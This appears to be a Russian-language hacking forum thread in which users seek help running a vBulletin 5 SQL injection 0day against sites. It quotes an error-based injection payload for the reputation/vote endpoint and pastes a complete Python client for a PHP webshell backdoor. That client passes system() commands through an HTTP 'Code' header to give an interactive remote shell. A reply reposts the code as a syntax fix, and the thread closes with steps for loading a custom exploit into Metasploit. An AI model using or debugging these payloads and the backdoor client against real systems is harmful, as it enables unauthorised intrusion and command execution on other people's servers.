Во общем не могу разобраться как запустить этот эксплоит http://57un.wordpress.com/2013/03/24/ewww-vbulletin-5-beta-xx-sqli-0day-exploit-nasty на видео показано, что нужно его запустить с Localhost в этой теме написано ,что нужно установить ActivePerl и запустить через командную строку, я пытался сделать как на видео, скачал WAMP кидаю в папку "WWW" экплоит в формате .pl но нефига не получается и переименовал его в PHP тоже самое. А когда запускаю через командную строку Помогите запустить, как показано на видео!
Для этого эксплоита требуется зареганный логин пасс от форума! он сначало авторезируется, а только потом эксплуатирует уязвимость!
То запустить в таком формате: site.com /forum.php User Password и что такое MAGICNUM? P.S Пробел нужно ставить после хоста или сплошным адресом?
Когда добавляю строку index.php/ajax/api/reputation/vote меняется структура сайта на простую (т.е на белом фоне как бы упрощённый режим) Но дальнейший код [ 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338', ], не проходит - всё белое
запускаю этот сплойт C:\Python33>python.exe c:\python33\php-sh\client.py #!/usr/bin/python # Client for the backdoor which # uses HTTP CODE header for inserting code # Got the idea after seeing this sort of payload # dropped by a phpmyadmin exploit on rdot # Is also good to learn how to use urllib # and not be lazy arse with requests all of time! # Insecurety Research (2013) - insecurety.net import urllib2 import sys def usage(program): print "HTTP CODE Header Backdoor Command Shell" print "Usage: %s <Backdoor URL>" %(program) print "Example: %s http://www.test.com/webshell.php" %(program) sys.exit(0) def main(args): try: if len(args) < 2: usage(args[0]) print "[+] Using %s as target" %(args[1]) print "[!] Popping a shell, type 'exit' to quit" while True: opener = urllib2.build_opener() url = args[1] cmd = raw_input('~$ ') if cmd == "exit": sys.exit(0) else: code = "system('%s');" %(cmd) opener.addheaders.append(('Code', code))# %(str(code)) urllib2.install_opener(opener) result = urllib2.urlopen(url).read() print result except Exception, e: print e if __name__ == "__main__": main(sys.argv) в итоге вылазит File "c:\python33\php-sh\client.py", line 13 print "HTTP CODE Header Backdoor Command Shell" ^ SyntaxError: invalid syntax в чем проблема? что там на 13 линии, что исправить? Посоветуйте пожалуйста сам сплойт лежит тут _ttp://packetstormsecurity.com/files/download/122167/php-sh.tar.gz заранее благодарен за совет!
В программах на языке Python отступы являются требованием языка, а не стилем PHP: #!/usr/bin/python # Client for the backdoor which # uses HTTP CODE header for inserting code # Got the idea after seeing this sort of payload # dropped by a phpmyadmin exploit on rdot :) # Is also good to learn how to use urllib # and not be lazy arse with requests all of time! # Insecurety Research (2013) - insecurety.net import urllib2 import sys def usage(program): print "HTTP CODE Header Backdoor Command Shell" print "Usage: %s <Backdoor URL>" %(program) print "Example: %s http://www.test.com/webshell.php" %(program) sys.exit(0) def main(args): try: if len(args) < 2: usage(args[0]) print "[+] Using %s as target" %(args[1]) print "[!] Popping a shell, type 'exit' to quit" while True: opener = urllib2.build_opener() url = args[1] cmd = raw_input('~$ ') if cmd == "exit": sys.exit(0) else: code = "system('%s');" %(cmd) opener.addheaders.append(('Code', code))# %(str(code)) urllib2.install_opener(opener) result = urllib2.urlopen(url).read() print result except Exception, e: print e if __name__ == "__main__": main(sys.argv)
1.Launch a terminal window and navigate to the ".msf" folder in your home folder with the "cd" command. The ".msf" folder will be called ".msf3" if you are using Metasploit 3. 2 Create a directory structure matching that of the primary, shared "msf" folder using the "mkdir" command. For example, to add a miscellaneous Windows exploit you would create a directory structure that looked like "modules/exploits/windows/misc" in the ".msf" folder. 3 Copy your exploit into the directory using the "cp" command. The next time you start Metasploit, you will see an additional exploit in the framework list and may access the exploit with the "use" command.